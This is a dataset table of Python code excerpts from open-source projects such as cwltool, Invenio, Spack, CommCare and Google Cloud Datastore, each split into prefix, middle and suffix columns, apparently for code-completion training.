| repo_name (string, 5-100 chars) | path (string, 4-231 chars) | language (1 class) | license (15 classes) | size (int64, 6-947k) | score (float64, 0-0.34) | prefix (string, 0-8.16k chars) | middle (string, 3-512 chars) | suffix (string, 0-8.17k chars) |
|---|---|---|---|---|---|---|---|---|
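Each row below is one sample: the `prefix`, `middle`, and `suffix` columns split a single source-file excerpt at two cut points, so concatenating them in order appears to recover the contiguous text (the first row's `get_da` / `ta(...)` boundary shows this). Below is a minimal sketch of that reassembly, assuming Python; the row literal is a hand-copied, abbreviated stand-in for the first sample, since this dump names no dataset identifier or loader.

```python
# Hypothetical row dict mirroring the schema above; values abbreviated
# from the first sample below (common-workflow-language/cwltool).
row = {
    "repo_name": "common-workflow-language/cwltool",
    "path": "tests/test_empty_input.py",
    "language": "Python",
    "license": "apache-2.0",
    "size": 513,
    "score": 0.0,
    "prefix": 'params = [\n"--outdir",\nstr(tmp_path),\nget_da',
    "middle": 'ta("tests/wf/no-parameters-echo.cwl"),',
    "suffix": '\n"-",\n]\n',
}

# Concatenating the three text columns restores the contiguous excerpt.
excerpt = row["prefix"] + row["middle"] + row["suffix"]
print(f'{row["repo_name"]}:{row["path"]} ({row["size"]} bytes, score {row["score"]})')
print(excerpt)
```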
common-workflow-language/cwltool
|
tests/test_empty_input.py
|
Python
|
apache-2.0
| 513
| 0
|
from io import StringIO
from pathlib import Path
from cwltool.main import main
from .util import get_data
def test_empty_input(tmp_path: Path) -> None:
"""Affirm that an empty input works."""
empty_json = "{}"
empty_input = StringIO(empty_json)
params = [
"--outdir",
str(tmp_path),
get_da
|
ta("tests/wf/no-parameters-echo.cwl"),
"-",
]
try:
assert main(params, stdin=empty_input) == 0
except SystemExit as err:
|
assert err.code == 0
|
alphagov/digitalmarketplace-api
|
migrations/versions/940_more_supplier_details.py
|
Python
|
mit
| 1,372
| 0.007289
|
""" Extend suppliers table with new fields (to be initially populated from declaration data)
Revision ID: 940
Revises: 930
Create Date: 2017-08-16 16:39:00.000000
"""
# revision identifiers, used by Alembic.
revision = '940'
down_revision = '93
|
0'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_co
|
lumn(u'suppliers', sa.Column('registered_name', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('registration_country', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('other_company_registration_number', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('registration_date', sa.DateTime(), nullable=True))
op.add_column(u'suppliers', sa.Column('vat_number', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('organisation_size', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('trading_status', sa.String(), nullable=True))
def downgrade():
op.drop_column(u'suppliers', 'registered_name')
op.drop_column(u'suppliers', 'registration_country')
op.drop_column(u'suppliers', 'other_company_registration_number')
op.drop_column(u'suppliers', 'registration_date')
op.drop_column(u'suppliers', 'vat_number')
op.drop_column(u'suppliers', 'organisation_size')
op.drop_column(u'suppliers', 'trading_status')
|
weiHelloWorld/accelerated_sampling_with_autoencoder
|
MD_simulation_on_alanine_dipeptide/current_work/src/biased_simulation.py
|
Python
|
mit
| 16,759
| 0.007101
|
"""
This file is for biased simulation of alanine dipeptide only; it is used as the test for the
more general file biased_simulation_general.py, which can easily be extended to other new
systems.
"""
from ANN_simulation import *
from simtk.openmm.app import *
from simtk.openmm import *
from simtk.unit import *
from sys import stdout
import ast, argparse
import os
import datetime
from config import *
parser = argparse.ArgumentParser()
parser.add_argument("record_interval", type=int, help="interval to take snapshots")
parser.add_argument("total_num_of_steps", type=int, help="total number of simulation steps")
parser.add_argument("force_constant", type=float, help="force constants")
parser.add_argument("folder_to_store_output_files", type=str, help="folder to store the output pdb and report files")
parser.add_argument("autoencoder_info_file", type=str, help="file to store autoencoder information (coefficients)")
parser.add_argument("pc_potential_center", type=str, help="potential center (should include 'pc_' as prefix)")
parser.add_argument("--out_traj", type=str, default=None, help="output trajectory file")
parser.add_argument("--layer_types", type=str, default=str(CONFIG_27), help='layer types')
parser.add_argument("--num_of_nodes", type=str, default=str(CONFIG_3[:3]), help='number of nodes in each layer')
parser.add_argument("--temperature", type=int, default= CONFIG_21, help='simulation temperature')
parser.add_argument("--data_type_in_input_layer", type=int, default=1, help='data_type_in_input_layer, 0 = cos/sin, 1 = Cartesian coordinates')
parser.add_argument("--platform", type=str, default=CONFIG_23, help='platform on which the simulation is run')
parser.add_argument("--scaling_factor", type=float, default = float(CONFIG_49), help='sca
|
ling_factor for ANN_Force')
parser.add_argument("--starting_pdb_file", type=str, default='../resources/alanine_dipeptide.pdb', help='the input pdb file to start simulation')
parser.add_argument("--starting_frame", type=int, default=0, help="index of starting frame in the starting pdb file")
parser.add_argument("--minimize_energy", type=int, default=1, help='whether to minimize energy (1 = yes, 0 = no)')
|
parser.add_argument("--equilibration_steps", type=int, default=1000, help="number of steps for the equilibration process")
# next few options are for metadynamics
parser.add_argument("--bias_method", type=str, default='US', help="biasing method for enhanced sampling, US = umbrella sampling, MTD = metadynamics")
parser.add_argument("--MTD_pace", type=int, default=CONFIG_66, help="pace of metadynamics")
parser.add_argument("--MTD_height", type=float, default=CONFIG_67, help="height of metadynamics")
parser.add_argument("--MTD_sigma", type=float, default=CONFIG_68, help="sigma of metadynamics")
parser.add_argument("--MTD_WT", type=int, default=CONFIG_69, help="whether to use well-tempered version")
parser.add_argument("--MTD_biasfactor", type=float, default=CONFIG_70, help="biasfactor of well-tempered metadynamics")
# following is for plumed script
parser.add_argument("--plumed_file", type=str, default=None, help="plumed script for biasing force, used only when the bias_method == plumed_other")
parser.add_argument("--plumed_add_string", type=str, default="", help="additional string to be attached to the end of plumed script in args.plumed_file")
# note on "force_constant_adjustable" mode:
# the simulation will stop if either:
# force constant is greater or equal to max_force_constant
# or distance between center of data cloud and potential center is smaller than distance_tolerance
parser.add_argument("--fc_adjustable", help="set the force constant to be adjustable", action="store_true")
parser.add_argument("--max_fc", type=float, default=CONFIG_32, help="max force constant (for force_constant_adjustable mode)")
parser.add_argument("--fc_step", type=float, default=CONFIG_34, help="the value by which the force constant is increased each time (for force_constant_adjustable mode)")
parser.add_argument("--distance_tolerance", type=float, default=CONFIG_35, help="max distance allowed between center of data cloud and potential center (for force_constant_adjustable mode)")
parser.add_argument("--autoencoder_file", type=str, help="pkl file that stores autoencoder (for force_constant_adjustable mode)")
parser.add_argument("--remove_previous", help="remove previous outputs while adjusting force constants", action="store_true")
args = parser.parse_args()
record_interval = args.record_interval
total_number_of_steps = args.total_num_of_steps
input_data_type = ['cossin', 'Cartesian', 'pairwise'][args.data_type_in_input_layer]
force_constant = args.force_constant
scaling_factor = args.scaling_factor
layer_types = re.sub("\[|\]|\"|\'| ",'', args.layer_types).split(',')
num_of_nodes = re.sub("\[|\]|\"|\'| ",'', args.num_of_nodes).split(',')
num_of_nodes = [int(item) for item in num_of_nodes]
out_format = '.dcd' if args.out_traj is None else os.path.splitext(args.out_traj)[1]
if float(force_constant) != 0:
from ANN import *
folder_to_store_output_files = args.folder_to_store_output_files # this is used to separate outputs for different networks into different folders
autoencoder_info_file = args.autoencoder_info_file
potential_center = list([float(x) for x in args.pc_potential_center.replace('"','')\
.replace('pc_','').split(',')]) # this API is the generalization for higher-dimensional cases
if not os.path.exists(folder_to_store_output_files):
try: os.makedirs(folder_to_store_output_files)
except: pass
def run_simulation(force_constant):
assert(os.path.exists(folder_to_store_output_files))
input_pdb_file_of_molecule = args.starting_pdb_file
force_field_file = 'amber99sb.xml'
water_field_file = 'tip3p.xml'
pdb_reporter_file = '%s/output_fc_%f_pc_%s.pdb' %(folder_to_store_output_files, force_constant, str(potential_center).replace(' ',''))
if not args.out_traj is None:
pdb_reporter_file = args.out_traj
state_data_reporter_file = pdb_reporter_file.replace('output_fc', 'report_fc').replace('.pdb', '.txt')
# check if the files already exist (and back them up if so)
for item_filename in [pdb_reporter_file, state_data_reporter_file]:
Helper_func.backup_rename_file_if_exists(item_filename)
index_of_backbone_atoms = CONFIG_57[0]
flag_random_seed = 0 # whether we need to fix this random seed
simulation_temperature = args.temperature
time_step = CONFIG_22 # simulation time step, in ps
pdb = PDBFile(input_pdb_file_of_molecule)
modeller = Modeller(pdb.topology, pdb.getPositions(frame=args.starting_frame))
solvent_opt = 'no_water'
if solvent_opt == 'explicit':
forcefield = ForceField(force_field_file, water_field_file)
modeller.addSolvent(forcefield, model=water_field_file.split('.xml')[0], boxSize=Vec3(3, 3, 3) * nanometers,
ionicStrength=0 * molar)
system = forcefield.createSystem(modeller.topology, nonbondedMethod=PME, nonbondedCutoff=1.0 * nanometers,
constraints=AllBonds, ewaldErrorTolerance=0.0005)
else:
forcefield = ForceField(force_field_file)
system = forcefield.createSystem(modeller.topology, nonbondedMethod=NoCutoff, constraints=AllBonds)
if args.bias_method == "US":
if float(force_constant) != 0:
force = ANN_Force()
force.set_layer_types(layer_types)
force.set_data_type_in_input_layer(args.data_type_in_input_layer)
force.set_list_of_index_of_atoms_forming_dihedrals_from_index_of_backbone_atoms(index_of_backbone_atoms)
force.set_index_of_backbone_atoms(index_of_backbone_atoms)
if args.data_type_in_input_layer == 2:
force.set_list_of_pair_index_for_distances(CONFIG_80)
force.set_num_of_nodes(num_of_nodes)
force.set_potential_center(potential_center)
force.set_force_constant(float(force_constant))
unit_scaling = 1.0 # TODO: check unit scaling
force.set_scaling_factor(float(scaling_factor) / unit_scaling) # since default unit is nm in O
|
goocarlos/domaindiscoverer
|
pythonwhois/net.py
|
Python
|
apache-2.0
| 4,072
| 0.030452
|
import socket, re, sys
from codecs import encode, decode
from . import shared
def get_whois_raw(domain, server="", previous=None, rfc3490=True, never_cut=False, with_server_list=False, server_list=None):
previous = previous or []
server_list = server_list or []
# Sometimes IANA simply won't give us the right root WHOIS server
exceptions = {
".ac.uk": "whois.ja.net",
".ps": "whois.pnina.ps",
".buzz": "whois.nic.buzz",
".moe": "whois.nic.moe",
# The following is a bit hacky, but IANA won't return the right answer for example.com because it's a direct registration.
"example.com": "whois.verisign-grs.com"
}
if rfc3490:
if sys.version_info < (3, 0):
domain = encode( domain if type(domain) is unicode else decode(domain, "utf8"), "idna" )
else:
domain = encode(domain, "idna").decode("ascii")
if len(previous) == 0 and server == "":
# Root query
is_exception = False
for exception, exc_serv in exceptions.items():
if domain.endswith(exception):
is_exception = True
target_server = exc_serv
break
if is_exception == False:
target_server = get_root_server(domain)
else:
target_server = server
if target_server == "whois.jprs.jp":
request_domain = "%s/e" % domain # Suppress Japanese output
elif domain.endswith(".de") and ( target_server == "whois.denic.de" or target_server == "de.whois-servers.net" ):
request_domain = "-T dn,ace %s" % domain # regional specific stuff
elif target_server == "whois.verisign-grs.com":
request_domain = "=%s" % domain # Avoid partial matches
else:
request_dom
|
ain = domain
response = whois_request(request_domain, target_server)
if never_cut:
# If the caller has requested to 'never cut' responses, he will get the original response from the server (this is
# useful for callers that are only interested in the raw data). Otherwise, if the target is verisign-grs, we will
# select the data relevant to the requested domain, and dis
|
card the rest, so that in a multiple-option response the
# parsing code will only touch the information relevant to the requested domain. The side-effect of this is that
# when `never_cut` is set to False, any verisign-grs responses in the raw data will be missing header, footer, and
# alternative domain options (this is handled a few lines below, after the verisign-grs processing).
new_list = [response] + previous
if target_server == "whois.verisign-grs.com":
# VeriSign is a little... special. As it may return multiple full records and there's no way to do an exact query,
# we need to actually find the correct record in the list.
for record in response.split("\n\n"):
if re.search("Domain Name: %s\n" % domain.upper(), record):
response = record
break
if never_cut == False:
new_list = [response] + previous
server_list.append(target_server)
for line in [x.strip() for x in response.splitlines()]:
match = re.match("(refer|whois server|referral url|whois server|registrar whois):\s*([^\s]+\.[^\s]+)", line, re.IGNORECASE)
if match is not None:
referal_server = match.group(2)
if referal_server != server and "://" not in referal_server: # We want to ignore anything non-WHOIS (eg. HTTP) for now.
# Referal to another WHOIS server...
return get_whois_raw(domain, referal_server, new_list, server_list=server_list, with_server_list=with_server_list)
if with_server_list:
return (new_list, server_list)
else:
return new_list
def get_root_server(domain):
data = whois_request(domain, "whois.iana.org")
for line in [x.strip() for x in data.splitlines()]:
match = re.match("refer:\s*([^\s]+)", line)
if match is None:
continue
return match.group(1)
raise shared.WhoisException("No root WHOIS server found for domain.")
def whois_request(domain, server, port=43):
socket.setdefaulttimeout(5)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((server, port))
sock.send(("%s\r\n" % domain).encode("utf-8"))
buff = b""
while True:
data = sock.recv(1024)
if len(data) == 0:
break
buff += data
return buff.decode("utf-8")
|
EUDAT-B2SHARE/invenio-old
|
modules/websearch/lib/search_engine.py
|
Python
|
gpl-2.0
| 314,285
| 0.007118
|
# -*- coding: utf-8 -*-
## This file is part of Invenio.
## Copyright (C) 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
# pylint: disable=C0301
"""Invenio Search Engine in mod_python."""
__lastupdated__ = """$Date$"""
__revision__ = "$Id$"
## import general modules:
import cgi
import cStringIO
import copy
import string
import os
import re
import time
import urllib
import urlparse
import zlib
import sys
try:
## import optional module:
import numpy
CFG_NUMPY_IMPORTABLE = True
except:
CFG_NUMPY_IMPORTABLE = False
if sys.hexversion < 0x2040000:
# pylint: disable=W0622
from sets import Set as set
# pylint: enable=W0622
## import Invenio stuff:
from invenio.config import \
CFG_CERN_SITE, \
CFG_INSPIRE_SITE, \
CFG_OAI_ID_FIELD, \
CFG_WEBCOMMENT_ALLOW_REVIEWS, \
CFG_WEBSEARCH_CALL_BIBFORMAT, \
CFG_WEBSEARCH_CREATE_SIMILARLY_NAMED_AUTHORS_LINK_BOX, \
CFG_WEBSEARCH_FIELDS_CONVERT, \
CFG_WEBSEARCH_NB_RECORDS_TO_SORT, \
CFG_WEBSEARCH_SEARCH_CACHE_SIZE, \
CFG_WEBSEARCH_SEARCH_CACHE_TIMEOUT, \
CFG_WEBSEARCH_USE_MATHJAX_FOR_FORMATS, \
CFG_WEBSEARCH_USE_ALEPH_SYSNOS, \
CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS, \
CFG_WEBSEARCH_FULLTEXT_SNIPPETS, \
CFG_WEBSEARCH_DISPLAY_NEAREST_TERMS, \
CFG_WEBSEARCH_WILDCARD_LIMIT, \
CFG_BIBUPLOAD_SERIALIZE_RECORD_STRUCTURE, \
CFG_BIBUPLO
|
AD_EXTERNAL_SYSNO_TAG, \
CFG_BIBRANK_SHOW_DOWNLOAD_GRAPHS, \
CFG_WEBSEARCH_SYNONYM_KBRS, \
CFG_SITE_LANG, \
CFG_SITE_NAME, \
CFG_LOGDIR, \
CFG_BIBFORMAT_HIDDEN_TAGS, \
CFG_SITE_URL, \
CFG_ACCESS_CONTROL_LEVEL_ACCOUNTS, \
CFG_SOLR_URL, \
CFG_WEBSEARCH_DETAILED_META_FORMAT, \
CFG_SITE_RECORD, \
CFG_WEBSEARCH_PREV_NEXT_HIT_LIMIT, \
CFG_WEBSEARCH_VIEWRESTRCOLL_POLICY, \
CFG_BIBSORT_BUCKETS, \
CFG_XAPIAN_ENABLED, \
|
CFG_BIBINDEX_CHARS_PUNCTUATION
from invenio.search_engine_config import \
InvenioWebSearchUnknownCollectionError, \
InvenioWebSearchWildcardLimitError, \
CFG_WEBSEARCH_IDXPAIRS_FIELDS,\
CFG_WEBSEARCH_IDXPAIRS_EXACT_SEARCH, \
CFG_SEARCH_RESULTS_CACHE_PREFIX
from invenio.search_engine_utils import get_fieldvalues, get_fieldvalues_alephseq_like
from invenio.bibrecord import create_record, record_xml_output
from invenio.bibrank_record_sorter import get_bibrank_methods, is_method_valid, rank_records as rank_records_bibrank
from invenio.bibrank_downloads_similarity import register_page_view_event, calculate_reading_similarity_list
from invenio.bibindex_engine_stemmer import stem
from invenio.bibindex_tokenizers.BibIndexDefaultTokenizer import BibIndexDefaultTokenizer
from invenio.bibindex_tokenizers.BibIndexCJKTokenizer import BibIndexCJKTokenizer, is_there_any_CJK_character_in_text
from invenio.bibindex_engine_utils import author_name_requires_phrase_search
from invenio.bibindex_engine_washer import wash_index_term, lower_index_term, wash_author_name
from invenio.bibindex_engine_config import CFG_BIBINDEX_SYNONYM_MATCH_TYPE
from invenio.bibindex_engine_utils import get_idx_indexer
from invenio.bibformat import format_record, format_records, get_output_format_content_type, create_excel
from invenio.bibformat_config import CFG_BIBFORMAT_USE_OLD_BIBFORMAT
from invenio.bibrank_downloads_grapher import create_download_history_graph_and_box
from invenio.bibknowledge import get_kbr_values
from invenio.data_cacher import DataCacher
from invenio.websearch_external_collections import print_external_results_overview, perform_external_collection_search
from invenio.access_control_admin import acc_get_action_id
from invenio.access_control_config import VIEWRESTRCOLL, \
CFG_ACC_GRANT_AUTHOR_RIGHTS_TO_EMAILS_IN_TAGS, \
CFG_ACC_GRANT_VIEWER_RIGHTS_TO_EMAILS_IN_TAGS
from invenio.websearchadminlib import get_detailed_page_tabs, get_detailed_page_tabs_counts
from invenio.intbitset import intbitset
from invenio.dbquery import DatabaseError, deserialize_via_marshal, InvenioDbQueryWildcardLimitError
from invenio.access_control_engine import acc_authorize_action
from invenio.errorlib import register_exception
from invenio.textutils import encode_for_xml, wash_for_utf8, strip_accents
from invenio.htmlutils import get_mathjax_header
from invenio.htmlutils import nmtoken_from_string
import invenio.template
webstyle_templates = invenio.template.load('webstyle')
webcomment_templates = invenio.template.load('webcomment')
from invenio.bibrank_citation_searcher import calculate_cited_by_list, \
calculate_co_cited_with_list, get_records_with_num_cites, get_self_cited_by, \
get_refersto_hitset, get_citedby_hitset
from invenio.bibrank_citation_grapher import create_citation_history_graph_and_box
from invenio.dbquery import run_sql, run_sql_with_limit, wash_table_column_name, \
get_table_update_time
from invenio.webuser import getUid, collect_user_info, session_param_set
from invenio.webpage import pageheaderonly, pagefooteronly, create_error_box, write_warning
from invenio.messages import gettext_set_language
from invenio.search_engine_query_parser import SearchQueryParenthesisedParser, \
SpiresToInvenioSyntaxConverter
from invenio import webinterface_handler_config as apache
from invenio.solrutils_bibindex_searcher import solr_get_bitset
from invenio.xapianutils_bibindex_searcher import xapian_get_bitset
try:
import invenio.template
websearch_templates = invenio.template.load('websearch')
except:
pass
from invenio.websearch_external_collections import calculate_hosted_collections_results, do_calculate_hosted_collections_results
from invenio.websearch_external_collections_config import CFG_HOSTED_COLLECTION_TIMEOUT_ANTE_SEARCH
from invenio.websearch_external_collections_config import CFG_HOSTED_COLLECTION_TIMEOUT_POST_SEARCH
from invenio.websearch_external_collections_config import CFG_EXTERNAL_COLLECTION_MAXRESULTS
VIEWRESTRCOLL_ID = acc_get_action_id(VIEWRESTRCOLL)
## global vars:
cfg_nb_browse_seen_records = 100 # limit of the number of records to check when browsing a certain collection
cfg_nicely_ordered_collection_list = 0 # do we propose the collection list nicely ordered or alphabetically?
## precompile some often-used regexp for speed reasons:
re_word = re.compile('[\s]')
re_quotes = re.compile('[\'\"]')
re_doublequote = re.compile('\"')
re_logical_and = re.compile('\sand\s', re.I)
re_logical_or = re.compile('\sor\s', re.I)
re_logical_not = re.compile('\snot\s', re.I)
re_operators = re.compile(r'\s([\+\-\|])\s')
re_pattern_wildcards_after_spaces = re.compile(r'(\s)[\*\%]+')
re_pattern_single_quotes = re.compile("'(.*?)'")
re_pattern_double_quotes = re.compile("\"(.*?)\"")
re_pattern_parens_quotes = re.compile(r'[\'\"]{1}[^\'\"]*(\([^\'\"]*\))[^\'\"]*[\'\"]{1}')
re_pattern_regexp_quotes = re.compile("\/(.*?)\/")
re_pattern_spaces_after_colon = re.compile(r'(:\s+)')
re_pattern_short_words = re.compile(r'([\s\"]\w{1,3})[\*\%]+')
re_pattern_space = re.compile("__SPACE__")
re_pattern_today = re.compile("\$TODAY\$")
re_pattern_parens = re.compile(r'\([^\)]+\s+[^\)]+\)')
re_punctuation_followed_by_space = re.compile(CFG_BIBINDEX_CHARS_PUNCTUATION + '\s')
## em possible values
EM_REPOSITORY={"body" : "B",
"header" : "H",
"footer" : "F",
"search_box" : "S",
"see_also_box" : "L",
"basket" : "K",
"alert" : "A",
|
TheTimmy/spack
|
lib/spack/external/__init__.py
|
Python
|
lgpl-2.1
| 2,139
| 0
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRAN
|
TY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place,
|
Suite 330, Boston, MA 02111-1307 USA
##############################################################################
"""
This module contains external, potentially separately licensed,
packages that are included in spack.
So far:
argparse: We include our own version to be Python 2.6 compatible.
distro: Provides a more stable linux distribution detection.
functools: Used for implementation of total_ordering.
jinja2: A modern and designer-friendly templating language for Python
jsonschema: An implementation of JSON Schema for Python.
ordereddict: We include our own version to be Python 2.6 compatible.
py: Needed by pytest. Library with cross-python path,
ini-parsing, io, code, and log facilities.
pyqver2: External script to query required python version of
python source code. Used for ensuring 2.6 compatibility.
pytest: Testing framework used by Spack.
yaml: Used for config files.
"""
|
dimagi/commcare-hq
|
corehq/apps/reports/standard/users/reports.py
|
Python
|
bsd-3-clause
| 10,221
| 0.00137
|
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Q
from django.template.loader import render_to_string
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy
from memoized import memoized
from corehq import privileges
from corehq.apps.accounting.models import BillingAccount
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.reports.datatables import DataTablesColumn, DataTablesHeader
from corehq.apps.reports.dispatcher import UserManagementReportDispatcher
from corehq.apps.reports.filters.users import (
ChangeActionFilter,
ChangedByUserFilter,
EnterpriseUserFilter,
)
from corehq.apps.reports.filters.users import \
ExpandedMobileWorkerFilter as EMWF
from corehq.apps.reports.generic import GenericTabularReport, GetParamsMixin, PaginatedReportMixin
from corehq.apps.reports.standard import DatespanMixin, ProjectReport
from corehq.apps.users.audit.change_messages import (
ASSIGNED_LOCATIONS_FIELD,
CHANGE_MESSAGES_FIELDS,
DOMAIN_FIELD,
LOCATION_FIELD,
PHONE_NUMBERS_FIELD,
ROLE_FIELD,
TWO_FACTOR_FIELD,
get_messages,
)
from corehq.apps.users.models import UserHistory
from corehq.const import USER_DATETIME_FORMAT
from corehq.util.timezones.conversions import ServerTime
class UserHistoryReport(GetParamsMixin, DatespanMixin, GenericTabularReport, ProjectReport, PaginatedReportMixin):
slug = 'user_history'
name = ugettext_lazy("User History")
section_name = ugettext_lazy("User Management")
dispatcher = UserManagementReportDispatcher
fields = [
'corehq.apps.reports.filters.users.AffectedUserFilter',
'corehq.apps.reports.filters.users.ChangedByUserFilter',
'corehq.apps.reports.filters.dates.DatespanFilter',
'corehq.apps.reports.filters.users.ChangeActionFilter',
'corehq.apps.reports.filters.users.UserPropertyFilter',
'corehq.apps.reports.filters.users.UserUploadRecordFilter',
]
description = ugettext_lazy("History of user updates")
ajax_pagination = True
default_sort = {'changed_at': 'desc'}
@classmethod
def get_primary_properties(cls, domain):
"""
Get slugs and human-friendly names for the properties that are available
for filtering and/or displayed by default in the report, without
needing to click "See More".
"""
if domain_has_privilege(domain, privileges.APP_USER_PROFILES):
user_data_label = _("profile or user data")
else:
user_data_label = _("user data")
return {
"username": _("username"),
ROLE_FIELD: _("role"),
"email": _("email"),
DOMAIN_FIELD: _("project"),
"is_active": _("is active"),
"language": _("language"),
PHONE_NUMBERS_FIELD: _("phone numbers"),
LOCATION_FIELD: _("primary location"),
"user_data": user_data_label,
TWO_FACTOR_FIELD: _("two factor authentication disabled"),
ASSIGNED_LOCATIONS_FIELD: _("assigned locations"),
}
@property
def headers(self):
h = [
DataTablesColumn(_("Affected User"), sortable=False),
DataTablesColumn(_("Modified by User"), sortable=False),
DataTablesColumn(_("Action"), prop_name='action'),
DataTablesColumn(_("Via"), prop_name='changed_via'),
DataTablesColumn(_("Changes"), sortable=False),
DataTablesColumn(_("Change Message"), sortable=False),
DataTablesColumn(_("Timestamp"), prop_name='changed_at'),
]
return DataTablesHeader(*h)
@property
def total_records(self):
return self._get_queryset().count()
@memoized
def _get_queryset(self):
user_slugs = self.request.GET.getlist(EMWF.slug)
user_ids = self._get_user_ids(user_slugs)
# return empty queryset if no matching users were found
if user_slugs and not user_ids:
return UserHistory.objects.none()
changed_by_user_slugs = self.request.GET.getlist(ChangedByUserFilter.slug)
changed_by_user_ids = self._get_user_ids(changed_by_user_slugs)
# return empty queryset if no matching users were found
if changed_by_user_slugs and not changed_by_user_ids:
return UserHistory.objects.none()
user_property = self.request.GET.get('user_property')
actions = self.request.GET.getlist('action')
user_upload_record_id = self.request.GET.get('user_upload_record')
query = self._build_query(user_ids, changed_by_user_ids, user_property, actions, user_upload_record_id)
return query
def _get_user_ids(self, slugs):
es_query = self._get_users_es_query(slugs)
return es_query.values_list('_id', flat=True)
def _get_users_es_query(self, slugs):
return EnterpriseUserFilter.user_es_query(
self.domain,
slugs,
self.request.couch_user,
)
def _build_query(self, user_ids, changed_by_user_ids, user_property, actions, user_upload_record_id):
filters = Q(for_domain__in=self._for_domains())
if user_ids:
filters = filters & Q(user_id__in=user_ids)
if changed_by_user_ids:
filters = filters & Q(changed_by__in=changed_by_user_ids)
if user_property:
filters = filters & self._get_property_filters(user_property)
|
if actions and ChangeActionFilter.ALL not in actions:
filters = filte
|
rs & Q(action__in=actions)
if user_upload_record_id:
filters = filters & Q(user_upload_record_id=user_upload_record_id)
if self.datespan:
filters = filters & Q(changed_at__lt=self.datespan.enddate_adjusted,
changed_at__gte=self.datespan.startdate)
return UserHistory.objects.filter(filters)
def _for_domains(self):
return BillingAccount.get_account_by_domain(self.domain).get_domains()
@staticmethod
def _get_property_filters(user_property):
if user_property in CHANGE_MESSAGES_FIELDS:
query_filters = Q(change_messages__has_key=user_property)
# to include CommCareUser creation from UI where a location can be assigned as a part of user creation
# which is tracked only under "changes" and not "change messages"
if user_property == LOCATION_FIELD:
query_filters = query_filters | Q(changes__has_key='location_id')
else:
query_filters = Q(changes__has_key=user_property)
return query_filters
@property
def rows(self):
records = self._get_queryset().order_by(self.ordering)[
self.pagination.start:self.pagination.start + self.pagination.count
]
for record in records:
yield self._user_history_row(record, self.domain, self.timezone)
@property
def ordering(self):
by, direction = list(self.get_sorting_block()[0].items())[0]
return '-' + by if direction == 'desc' else by
@memoized
def _get_location_name(self, location_id):
from corehq.apps.locations.models import SQLLocation
if not location_id:
return None
try:
location_object = SQLLocation.objects.get(location_id=location_id)
except ObjectDoesNotExist:
return None
return location_object.display_name
def _user_history_row(self, record, domain, timezone):
return [
record.user_repr,
record.changed_by_repr,
_get_action_display(record.action),
record.changed_via,
self._user_history_details_cell(record.changes, domain),
self._html_list(list(get_messages(record.change_messages))),
ServerTime(record.changed_at).user_time(timezone).ui_string(USER_DATETIME_FORMAT),
]
def _html_list(self, changes):
items = []
if isinstanc
|
tseaver/google-cloud-python
|
datastore/tests/unit/test_client.py
|
Python
|
apache-2.0
| 44,363
| 0.000654
|
# Copyright 2014 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import mock
def _make_credentials():
import google.auth.credentials
return mock.Mock(spec=google.auth.credentials.Credentials)
def _make_entity_pb(project, kind, integer_id, name=None, str_val=None):
from google.cloud.datastore_v1.proto import entity_pb2
from google.cloud.datastore.helpers import _new_value_pb
entity_pb = entity_pb2.Entity()
entity_pb.key.partition_id.project_id = project
path_element = entity_pb.key.path.add()
path_element.kind = kind
path_element.id = integer_id
if name is not None and str_val is not None:
value_pb = _new_value_pb(entity_pb, name)
value_pb.string_value = str_val
return entity_pb
class Test__get_gcd_project(unittest.TestCase):
def _call_fut(self):
from google.cloud.datastore.client import _get_gcd_project
return _get_gcd_project()
def test_no_value(self):
environ = {}
with mock.patch("os.getenv", new=environ.get):
project = self._call_fut()
self.assertIsNone(project)
def test_value_set(self):
from google.cloud.datastore.client import GCD_DATASET
MOCK_PROJECT = object()
environ = {GCD_DATASET: MOCK_PROJECT}
with mock.patch("os.getenv", new=environ.get):
project = self._call_fut()
self.assertEqual(project, MOCK_PROJECT)
class Test__determine_default_project(unittest.TestCase):
def _call_fut(self, project=None):
from google.cloud.datastore.client import _determine_default_project
return _determine_default_project(project=project)
def _determine_default_helper(self, gcd=None, fallback=None, project_called=None):
